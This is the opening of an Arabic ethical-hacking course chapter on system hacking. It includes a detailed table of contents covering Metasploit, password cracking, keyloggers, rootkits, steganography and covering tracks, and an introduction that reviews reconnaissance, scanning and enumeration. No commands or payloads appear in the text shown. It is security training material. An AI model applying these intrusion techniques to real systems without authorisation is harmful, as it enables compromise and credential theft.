You are on page 1of 202

5

‫اﻟﮭﺎﻛﺮ اﻷﺧﻼﻗﻲ‬
(SYSTEM HACKING) ‫اﺧﺗراق اﻟﻧظﺎم‬

By

Dr.Mohammed Sobhy Teba


Exploitation
https://www.facebook.com/tibea2004
288

CONTENTS

294 ........................................................................................................................................................................................... ‫ ﻣﻘدﻣﮫ‬5.1

295 .......................................................................................................................................................... ‫ﻣﺎ ھو اھداف ﻋﻣﻠﯾﺔ اﻻﺧﺗراق؟‬

295 ........... ................................................................................................ (CEH Hacking Methodology) (CHM) ‫ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ‬

296 ..................... ................................................................................................ ‫؟‬System Hacking ‫ او‬Exploitation ‫ﻣﺎ ھو اﻻﺧﺗراق‬

296 ................. ................................................................................................................................................................ Metasploit 5.2

298 ............ ................................................................................................Mastering the Metasploit Console (MSFCONSOLE)

299 .. ................................................................:‫ ھﻲ ﻛﺎﻻﺗﻰ‬msfconsole ‫ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم‬

299 ......... ................................................................................................MSFCONSOLE ‫ﺳوف ﻧﻘوم اﻻن ﺑﺗﻧﻔﯾذ ﻋﻣﻠﯾﺔ اﺧﺗراق ﺑﺎﺳﺗﺧدام‬

305 .................. ................................................................ Mastering Armitage, the graphical management tool for Metasploit

306 ........... ................................................................................................‫ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟‬

308 ...............................................................................................................................Mastering the Metasploit CLI (MSFCLI)

310 .............................................................................................................................................................Metasploitable MySQL

310 ... ................................................................................................................................................................Metasploitable PDF

311 ............. ................................................................................................................................ Implementing browser_autopwn

312 .. ................................................................................................................................................................ Cracking passwords 5.3

312 ..............................................................................................................................‫(؟‬cracking password) ‫ﻣﺎ ھو ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‬

313 . ................................................................................................................................ Password Complexity ‫ﺗﻌﻘﯾدات ﻛﻠﻣﺎت اﻟﺳر‬

313 ..........................................................................................................................................................Microsoft Authentication

313 ....... ................................................................................................................................................................ SAM Database

317 .......................................................................................................................................................... NTLM Authentication

319 ................. ................................................................................................................................................................Kerberos

319 ..................... ................................................................................................................................................................Salting

320 ................................................................................................................................................................ Linux Authentication

321 .........................................................................................................................................................Password Management

322 ............. ................................................................................................Password Cracking Techniques ‫ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

322 ................................................................................................................................................................ Dictionary Attacks

322 .. ................................................................................................................................ Brute forcing attacks ‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‬

323 .................... ................................................................................................................................Hybrid Attack ‫اﻟﮭﺟوم اﻟﮭﺟﯾن‬

323 ....... ................................................................................................................................................................Syllable Attack

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


289

323 ... ................................................................................................................................Rule-based Attack ‫ھﺟوم ﻣﺳﺗﻧد إﻟﻰ ﻗواﻋد‬

323 ....................... ................................................................................................................................Types of Password Attacks

324 .. ................................................................................................................................Passive Online Attack: Wire Sniffing

325 ........................................................................................Passive Online Attack: Man-in-the-Middle and Replay Attack

326 ..........................................................................................................................Active Online Attack: Password Guessing

327 ............ ................................................................................................ Active Online Attack: Trojan/Spyware/Keylogger

327 ..................... ................................................................................................ Active Online Attack: Hash Injection Attack

328 ......... ................................................................................................................................Offline Attack: Rainbow Attacks

329 ..... ................................................................................................Tools to Create Rainbow Tables: Winrtgen and Rtgen

331 ..................... ................................................................................................Offline Attack: Distributed Network Attacks

333 ........................................................................................................................................................ Non-Electronic Attacks

334 . ................................................................................................................................................................ Default Passwords

335 .............................................................................................................................. Manual Password Cracking (Guessing)

336 ................ ................................................................................................................................ Automatic Password Cracking

337 ....................................................................................................................... Performing Automated Password Guessing

337 .. ................................................................................................................................Stealing Passwords Using Usb Drives

339 ... ................................................................................................................................Stealing Passwords Using Keylogger

339 ..............................................................................................................................Offline Password Attacks (HASH Attack)

339 .............. ................................................................................................Windows Hash Dumping: Pwdump and Fgdump

341 ................. ................................................................................................ Extracting the Hashes from the SAM (Locally)

344 .............. ................................................................................................ Extracting Windows Password Hashes Remotely

346 ................ ................................................................................................................................Cracking Simple Lm Hashes

349 ....... ................................................................................................................................................................Pass the HASH

349 ... ................................................................................................JTR (John the Ripper): King of the Password Crackers

352 ............ ................................................................................................................................................................L0phtCrack

356 ................ ................................................................................................................................................................Ophcrack

358 ........... ................................................................................................................................................................ Cain & Abel

358 ........ ................................................................................................................................................................Rainbowcrack

360 ............... ................................................................................................Mimikatz Tool to Recover Plain Text Passwords

362 ................................................................................................Password Resetting: The Building and the Wrecking Ball

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


290

365 ..............................................................................................Online Password Attack: Gaining Access to Remote Services

365 .............................................................................................................................THC-Hydra Password Cracker (Hydra)

369 ...................... ................................................................................................Medusa: Gaining Access to Remote Services

371 ............ ................................................................................................Ncrack — Network Authentication Cracking Tool

374 ................... ................................................................................................Password Profiling (Word list or Dictionary file)

375 ................. ................................................................................................................................ CeWL (Password Profiling)

376 .................... ................................................................................................................................................................Crunch

379 ..... ................................................................................................................................ Download Wordlists from the Web

379 .. ................................................................................................Hashcat and oclHashcat (Password Cracking with CUDA)

380 ...................... ................................................................................................................................ Hashcat and OclHashcat

385 ............. ................................................................................................................................................................OclHashcat

385 .............. ................................................................................................................................Other Password Cracking Tools

386 ........... ................................................................................................................................ ‫ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

386 ... ................................................................................................................................Windows Credentials Editor (WCE)

387 ............... ................................................................................................................................................................ CmosPwd

387 ... ................................................................................................................................ Physical access attacks with sucrack

388 ........ ................................................................................................Bypass Windows Logons with the Utilman.exe Trick

390 ......... ................................................................................................................................ LM Hash Backward Compatibility

391 ............................................................................................... (How to Disable LM HASH) LM HASH ‫ﻛﯾﻔﯾﺔ اﻟﻐﺎء ﺗﻔﻌﯾل اﺳﺗﺧدام‬

392 ...... ................................................................ How to Defend Against Password Cracking ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬

393 ......... ................................................................Implement and Enforce A Strong Security Policy ‫ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ‬

394 . ................................................................................................................................................................ Escalating Privileges 5.4

394 ...............................................................................................................................................................Privilege Escalation

394 ........ ................................................................................................ Privilege Escalation Tool: Active@ Password Changer

395 .................... ................................................................................................................................Using Impersonation Tokens

397 .............. ................................................................................................................................Other Privilege Escalation Tools

397 ..... ................................................................ (How to Defend Against Privilege Escalation) ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬

398 ............................................................................................................................................................. Executing Applications 5.5

398 ......................................................................................................................................................... Executing Applications

398 ...... ................................................................................................................................Executing Applications: RemoteExec

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


291

401 ................... ................................................................................................Executing Applications: DameWare NT Utilities

401 .................. ................................................................................................................................................................Keyloggers

402 .............................................................................................................................................................. Keylogger‫ﻛﯾف ﯾﻌﻣل ال‬

402 ................... ................................................................................................(Types Of Keystroke Loggers) Keylogger ‫أﻧواع‬

405 ............................... (Methodology Of Attacker In Using Remote Keylogger) ‫ ﻋن ﺑﻌد‬Keyloggers ‫ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام‬

405 ................... ................................................................................................................................ Acoustic/CAM Keyloggers

406 ............. ................................................................................................................................................................Keyloggers

407 .............. ................................................................................................................................Keylogger: Spytech SpyAgent

410 ......... ................................................................................................................................ Keylogger: All in One Keylogger

411 ....................... ................................................................................................................................Keyloggers for Windows

411 ............... ................................................................................................ Keylogger for MAC: Amac Keylogger for MAC

412 ............................................................................................................................................................. Keyloggers for MAC

412 .................... ................................................................................................................................ List of Linux Key Loggers

413 ........................................................................................................................................................... Hardware Keyloggers

414 ...................... ................................................................................................................................................................Spyware

415 .............................................................................................. ‫؟‬What Does the Spyware Do ‫ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس‬

415 ... ................................................................................................................................ (Types of Spyware) ‫أﻧواع ﺑراﻣﺞ اﻟﺗﺟﺳس‬

429 ......... ................................................................................................................................ How to Defend Against Keyloggers

430 ..... ................................................................................................................................................................Anti-Keyloggers

431 ............. ................................................................................................................................ How to Defend Against Spyware

433 ............................................................................................................................ Key Scan and Lockout Keylogger in Linux

433 ............ ................................................................................................................................ Key Logging with Meterpreter

435 ............... ................................................................................................................................................................Hiding Files 5.6

435 ...................... ................................................................................................................................................................ Rootkits

436 ... ................................................................................................................................................................Types of Rootkits

439 ................................................................................................................................ ‫ ﻛﯾف ﯾﻌﻣل اﻟروت ﻛﯾت؟‬How Rootkits Work

440 ............. ................................................................................................................................................................Rootkit: Fu

440 ..... ................................................................................................................................................................ Rootkit: KBeast

441 ..................... ................................................................................................ Hacker Defender: It is Not What You Think

444 . ................................................................................................................................................................ Detecting Rootkits

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


292

445 .......... ................................................................................................Steps For Detecting Rootkits ‫اﻟﺧطوات ﻻﻛﺗﺷﺎف اﻟروت ﻛت‬

446 .................. ................................................................................................................................Defending Against Rootkits

447 ............................................................................................................................................................ Anti-Rootkit: Stinger

447 ..................... ................................................................................................................................ Anti-Rootkit: UnHackMe

448 .................... ................................................................................................................................ Anti-Rootkit: Other Tools

448 .... ................................................................................................................................................................NTFS Data Stream

450 ........................................................................................NTFS Stream Manipulation (Hiding Trojan in NTFS Stream)

451 ....... ................................................................................................................................ Hiding Files Using NTFS Streams

452 .. ................................................................................................................................ Ntfs Stream Detector: StreamArmor

453 ... ................................................................................................................................NTFS Stream Detector: Other Tools

453 ........... ................................................................................................................................................................Steganography

455 .............. ................................................................................................................................Application of Steganography

457 ........... ................................................................................................................................Classification of Steganography

458 .......................................................................................................................Steganography Techniques ‫ﺗﻘﻧﯾﺎت أﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‬

461 .................. ................................................................................................................................How Steganography Works

461 ........................................................................................................................................................Types of Steganography

462 .......................................................................................... "Data Embedding Security Schemes" ‫ﻣﺧططﺎت أﻣن ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت‬

463 ........................................................................................................................... Whitespace Steganography Tool: SNOW

464 ........................................................................................................................................................... Image Steganography

469 ..................... ................................................................................................................................Document Steganography

470 ............................................................................................................................................................ Video Steganography

471 ............................................................................................................................................................Audio Steganography

474 ...........................................................................................................................................................Folder Steganography

475 ................. ................................................................................................................................ Spam/Email Steganography

476 ..... ................................................................................................Natural Text Steganography: Sams Big G Play Maker

476 .......... ................................................................................................ (Issues in Information Hiding)‫ﻣﺳﺎﺋل ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬

477 ............ ................................................................................................................................................................Steganalysis

478 .............. ................................................................................................ Steganalysis Methods/Attacks on Steganography

479 .......................................................................................................................... Detecting Text and Image Steganography

479 ........................................................................................................................ Detecting Audio and Video Steganography

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


293

479 ............... ................................................................ Steganography Detection Tool: Gargoyle Investigator Forensic Pro

480 ............ ................................................................................................................................Steganography Detection Tools

480 ........ ................................................................................................................................................................Covering Tracks 5.7

481 ................... ................................................................................................................................Covering Tracks ‫ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات‬

482 ................... ................................................................................................................................ Disabling Auditing: Auditpol

483 ............. ................................................................................................................................Covering Tracks Tool: CCleaner

484 ...... ................................................................................................................................ Covering Tracks Tool: MRU-Blaster

485 ............................................................................................................................................................... Track Covering Tools

485 ..... ................................................................................................................................................................Penetration testing 5.8

485 ... ................................................................................................................................................................ Password Cracking

486 ... ................................................................................................................................................................Privilege Escalation

487 ...............................................................................................................................................................Executing Application

487 ................ ................................................................................................................................................................Hiding Files

488 ........ ................................................................................................................................................................Covering Tracks

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪294‬‬

‫‪ 5.1‬ﻣﻘﺪﻣﮫ‬

‫ﯾرﻛز اﻟﻛﺗﺎب ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت‪ ،‬وأﻧﮭﺎ ﺑﻣﺛﺎﺑﺔ اﻹﻧذار اﻟﻧﮭﺎﺋﻲ‪ ،‬ﻓﻣن اﻷھﻣﯾﺔ أن ﻧؤﻛد ﻋﻠﻰ أھﻣﯾﺔ اﺳﺗﻛﻣﺎل اﻟﺧطوات اﻟﺳﺎﺑﻘﺔ ﻗﺑل إﺟراء اﻻﺳﺗﻐﻼل‬
‫او اﻻﺧﺗراق‪ .‬ﺣﯾث ﯾﻛون ﻣﻐرﯾﺎ ﺗﺟﺎوز ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد واﻟﻘﻔز ﻣﺑﺎﺷرة إﻟﻰ ھذا اﻟﺟزء‪ ،‬وھذا ﻋﻠﻰ ﻣﺎ ﯾرام ﻓﻲ اﻟوﻗت‬
‫اﻟراھن‪ ،‬وﻟﻛن إذا ﻛﻧت ﻣن أي وﻗت ﻣﺿﻰ ﻟﺗﻌزﯾز ﻣﮭﺎراﺗك ﻓﯾﺟب ﻋﻠﯾك ﺗﺟﺎوز ﻣﺳﺗوى ‪ ،script kids‬وﺳوف ﺗﺣﺗﺎج ﻹﺗﻘﺎن اﻟﺧطوات‬
‫اﻷﺧرى ﻛذﻟك‪ .‬ﻓﺈن ﻋدم اﻟﻘﯾﺎم ﺑذﻟك ﻟﯾس ﻓﻘط ﺗﺣد ﺑﺷدة ﻣن ﻗدرﺗك ﻟﺗﻧﺿﺞ ﺑﻣﺛﺎﺑﺔ ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻛﻧﮭﺎ ﺳﺗﻛون أﯾﺿﺎ ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف إﻋﺎﻗﺔ‬
‫اﻟﻧﻣو اﻟﺧﺎص ﺑك ﻛﺧﺑﯾر اﻻﺳﺗﻐﻼل‪ .‬ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد ﺗﺳﺎﻋدك ﻋﻠﻰ اﺣﻼل اﻟﻧظﺎم وﺗوﺟﯾﮫ اﻻﺳﺗﻐﻼل‪ .‬ﻗﺑل اﻟﺑدء ﻣﻊ ﻧظﺎم‬
‫اﻟﻘرﺻﻧﺔ واﻻﺧﺗراق‪ ،‬دﻋوﻧﺎ ﻧذھب ﺳرﯾﻌﺎ اﻟﻰ اﻟﻣراﺣل اﻟﺗﻲ ﻣررﻧﺎ ﺑﮭﺎ واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﺣﺗﻰ اﻵن‪ .‬ﻗﺑل ھذه اﻟوﺣدة‪ ،‬ﻧﺎﻗﺷﻧﺎ اﻻﺗﻲ‪:‬‬
‫‪ -1‬ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع )‪(Footprinting‬‬
‫‪ Footprinting‬ھو ﻋﻣﻠﯾﺔ ﺗﺟﻣﯾﻊ ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل ﻣﻌﯾﻧﺔ‪ .‬ﻋﺎدة ﯾﺗم ﺗطﺑﯾﻖ ھذه اﻟﺗﻘﻧﯾﺔ ﻟﻐرض اﯾﺟﺎد ﺳﺑل ﻻﻗﺗﺣﺎم ﺑﯾﺋﺔ‬
‫اﻟﺷﺑﻛﺔ‪ .‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣﮭﺎﺟﻣﺔ اﻟﻧظﺎم‪ ،‬وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻓﻲ اﻟﺣﻣﺎﯾﺔ‪ .‬ﻓﻲ ﻣرﺣﻠﺔ ‪ ،Footprinting‬إن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف‬
‫ﺗﻌرﯾﻔﻲ ﻟﻠﻣﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ‪ ،‬ﻣﻊ ﻣﻌﻠوﻣﺎت ﻣﺛل ﻧطﺎق ﻋﻧﺎوﯾن ‪ ،IP‬اﻷﺳﻣﺎء )‪ ،(namespace‬واﺳﺗﺧدام اﻟﻣوظﻔﯾن ﻟﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ Footprinting‬ﯾﺣﺳن ﺳﮭوﻟﺔ اﺧﺗراق اﻟﻧظم ﻣن ﺧﻼل اﻟﻛﺷف ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم‪ .‬ﺗﺣدﯾد اﻟﮭدف وﻣوﻗﻌﮫ ھﻲ اﻟﺧطوة اﻷوﻟﯾﺔ‬
‫اﻟﻣوﺟودة ﻓﻲ‪. Footprinting‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺻﻔﺣﺔ اﻟوﯾب ﻣن اﻟﻣﻧظﻣﺔ ﻧﻔﺳﮭﺎ ﻗد ﺗوﻓر ﺳﯾر اﻟﻣوظﻔﯾن أو ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﮫ‪ ،‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﮭﺎﻛر‬
‫ﺑﺎﺳﺗﺧداﻣﮫ ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﮭدف‪ .‬إﺟراء اﺳﺗﻌﻼم ‪ Whois‬ﻋن ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﯾوﻓر ﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺎت‬
‫اﻟﻣرﺗﺑطﺔ وأﺳﻣﺎء اﻟﻧطﺎﻗﺎت ذات اﻟﺻﻠﺔ ﻟﻣﻧظﻣﺔ ﻣﻌﯾﻧﺔ‪.‬‬
‫‪ -2‬ﻋﻣﻠﯾﺔ اﻟﻔﺣص )‪(Scanning‬‬
‫‪) Scanning‬اﻟﻔﺣص( ھو إﺟراء ﻟﺗﺣدﯾد اﻟﻣﺿﯾﻔﯾن اﻟﻧﺷطﺎء ﻋﻠﻰ اﻟﺷﺑﻛﺔ او ﻣﺎ ﯾﺳﻣﻰ ﺒ ‪ ،live hosts‬إﻣﺎ ﻟﻐرض ﺗﻘﯾﯾم أﻣن اﻟﺷﺑﻛﺎت أو‬
‫ﻟﻣﮭﺎﺟﻣﺗﮭم‪ .‬ﻓﻲ ﻣرﺣﻠﺔ اﻟﻔﺣص‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺟد ﻣﻌﻠوﻣﺎت ﺣول ﺗﻘﯾﯾم اﻟﻣﺳﺗﮭدف ﻣن ﺧﻼل ﻋﻧﺎوﯾن ‪ IP‬اﻟﺧﺎﺻﺔ ﺑﮫ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮫ‬
‫ﻋﺑر اﻹﻧﺗرﻧت‪ .‬اﻟﻔﺣص ﯾﮭﺗم أﺳﺎﺳﺎ ﺑﺗﺣدﯾد اﻟﻧظم ﻋﻠﻰ اﻟﺷﺑﻛﺔ وﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻛل ﻛﻣﺑﯾوﺗر‪.‬‬
‫ﺑﻌض اﻹﺟراءات ﻣﺛل ﻓﺣص اﻟﻣﻧﺎﻓذ‪/‬اﻟﺑورﺗﺎت اﻟﻣﯾﻧﺎء و‪ Ping swap‬ﺗﻘدم ﻟك ﻣﻌﻠوﻣﺎت ﺣول اﻟﺧدﻣﺎت اﻟﻣﻘدﻣﺔ ﻣن ﻗﺑل اﻟﻣﺿﯾﻔﯾن اﻟﺣﯾﺔ اﻟﺗﻲ‬
‫ﺗﻧﺷط ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ،‬وﻋﻧﺎوﯾن ‪ IP‬اﻟﺧﺎﺻﺔ ﺑﮭﺎ‪ .‬إﺟراء اﻟﻔﺣص ورﺳم اﻟﺧراﺋط اﻟﻌﻛﺳﯾﺔ ﯾرﺟﻊ ﻟك ﻣﻌﻠوﻣﺎت ﺣول ﻋﻧﺎوﯾن ‪ IP‬اﻟﺗﻲ ﻻ ﺗﻌﯾﯾن‬
‫إﻟﻰ اﻟﻣﺿﯾﻔﯾن اﻟﺣﻲ؛ وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺟﻌل اﻓﺗراﺿﺎت ﺣول اﻟﻌﻧﺎوﯾن اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -3‬ﻋﻣﻠﯾﺔ اﻟﺗﻌداد )‪(Enumeration‬‬
‫‪) Enumeration‬اﻟﺗﻌداد( ھو أﺳﻠوب اﻟﺗﺣﻘﯾﻖ ﻣن اﻟﺗطﻔل ﻓﻲ ﺗﻘﯾﯾم اﻟﮭدف ﻣن ﺧﻼﻟﮭﺎ اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣوا ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ﻗواﺋم ﻣﺳﺗﺧدم‬
‫اﻟﺷﺑﻛﺔ‪ ،‬ﺟداول اﻟﺗوﺟﯾﮫ‪ ،‬وﺑﯾﺎﻧﺎت ﺑروﺗوﻛول إدارة اﻟﺷﺑﻛﺔ)‪ . (SNMP‬ھذا اﻷﻣر ﺿروري ﻷن اﻟﻣﮭﺎﺟم ﯾﻌﺑر اﻻﻗﺎﻟﯾم اﻟﻣﺳﺗﮭدﻓﺔ ﻟﻛﺷف‬
‫اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ‪ ،‬وﻣﺷﺎرﻛﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬واﻟﺟروب‪ ،‬واﻟﺗطﺑﯾﻘﺎت‪ ،‬و‪.banners‬‬
‫ھدف اﻟﻣﮭﺎﺟم ھو ﺗﺣدﯾد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدم اﻟﺻﺎﻟﺣﺔ أو اﻟﻣﺟﻣوﻋﺎت ﺣﯾث ﯾﻣﻛن أن ﯾﺑﻘﻰ ﻏﯾر واﺿﺢ ﻋﻧد اﺧﺗراق اﻟﻧظﺎم‪ .‬اﻟﺗﻌداد ﯾﺷﻣل إﺟراء‬
‫اﺗﺻﺎﻻت ﻧﺷطﺔ ﻟﻧظﺎم اﻟﮭدف أو إﺧﺿﺎﻋﮭﺎ ﻟﺗوﺟﯾﮫ اﻻﺳﺗﻔﺳﺎرات‪ .‬ﻋﺎدة‪ ،‬ﻧظﺎم اﻟﺗﻧﺑﯾﮫ واﻷﻣن ﺳوف ﯾﻘوم ﺑﺗﺳﺟﯾل ﻣﺛل ھذه اﻟﻣﺣﺎوﻻت ﻓﻲ‬
‫ﻣﻠﻔﺎت اﻟﺳﺟل‪ .‬ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﺟﻣﻌﮭﺎ ھو ﻣﺎ ﻗد ﯾﺳﺗﮭدﻓﮭﺎ اﻟﻣﮭﺎﺟم ﻗد ﺗﻛون ﻋﺎﻣﮫ‪ ،‬ﻣﺛل ﻋﻧوان ‪DNS‬؛ وﻣﻊ ذﻟك‪ ،‬ﻓﻣن‬
‫اﻟﻣﻣﻛن أن ﯾﺗﻌﺛر اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻣﺷﺎرﻛﺔ ‪ IPC‬ﻋن ﺑﻌد‪ ،‬ﻣﺛل ‪ IPC$‬ﻓﻲ وﯾﻧدوز‪ ،‬واﻟﺗﻲ ﯾﻣﻛن ﺑﺣﺛﮭﺎ ﻣﻊ ‪ Null Session‬واﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺎن ﯾﺗم‬
‫ﺗﻌداد اﻟﻣﺷﺎرﻛﺔ واﻟﺣﺳﺎﺑﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪295‬‬

‫ﻣﺎ ھو اھداف ﻋﻣﻠﯾﺔ اﻻﺧﺗراق؟‬


‫ﻛل ﺟﻧﺎﺋﻲ ﯾرﺗﻛب ﺟرﯾﻣﺔ ﻣﺎ ﻟﺗﺣﻘﯾﻖ ھدف ﻣﻌﯾن‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم أﯾﺿﺎ ﻟدﯾﮭم ﺑﻌض اﻷھداف وراء اﻟﮭﺟﻣﺎت ﻋﻠﻰ أداء اﻟﻧظﺎم‪.‬‬
‫ﻗد ﯾﻛون ﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷھداف ﻣن اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ارﺗﻛﺎب ھﺟﻣﺎت ﻋﻠﻰ اﻟﻧظﺎم‪ .‬وﯾﺑﯾن اﻟﺟدول اﻟﺗﺎﻟﻲ ﺑﻌض اھداف اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﻣراﺣل‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻘرﺻﻧﺔ واﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻟﺗﺣﻘﯾﻖ ھذا اﻟﮭدف‪.‬‬

‫ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ )‪(CEH HACKING METHODOLOGY) (CHM‬‬


‫ﻗﺑل ﻗرﺻﻧﺔ اﻟﻧظﺎم‪ ،‬ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟم ﺗﻘﻧﯾﺎت ‪ Footprinting‬و‪ Scanning‬واﻟﺗﻌداد ﻟﻠﻛﺷف ﻋن اﻟﻣﻧطﻘﺔ اﻟﻣﺳﺗﮭدﻓﺔ ﻣن اﻟﮭﺟوم وﻧﻘﺎط‬
‫اﻟﺿﻌف اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون اﻟﻣداﺧل ﻟﻠﻣﮭﺎﺟﻣﯾن‪ .‬ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻼزﻣﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﺑدأ اﻟﻘرﺻﻧﺔ‪ .‬ﻋﻠﻰ ﻏرار‬
‫اﻟﻣﮭﺎﺟم‪ ،‬ﯾﺗﺑﻊ اﻟﮭﺎﻛر اﻷﺧﻼﻗﻲ أﯾﺿﺎ ﻧﻔس اﻟﺧطوات ﻻﺧﺗﺑﺎر اﻟﻧظﺎم أو ﺷﺑﻛﺔ‪ .‬ﻣن أﺟل ﺿﻣﺎن ﻓﻌﺎﻟﯾﺔ اﻻﺧﺗﺑﺎر‪ ،‬واﻟﮭﺎﻛر اﻷﺧﻼﻗﻲ ﯾﺗﺑﻊ ﻣﻧﮭﺟﯾﺔ‬
‫اﻟﻘرﺻﻧﺔ‪ .‬اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﯾﺻور ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ ﺗﻠﯾﮭﺎ ﻗراﺻﻧﺔ اﻷﺧﻼﻗﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪296‬‬

‫ﻣﺎ ھو اﻻﺧﺗراق ‪ EXPLOITATION‬او ‪SYSTEM HACKING‬؟‬


‫ﻣن أﺑﺳط اﻟﻣﺻطﻠﺣﺎت‪ Exploitation ،‬ھو اﺳﺗﻐﻼل ﻟﻧﻘﺎط اﻟﺿﻌف ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ اﻛﺗﺳﺎب اﻟﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﮭم أن‬
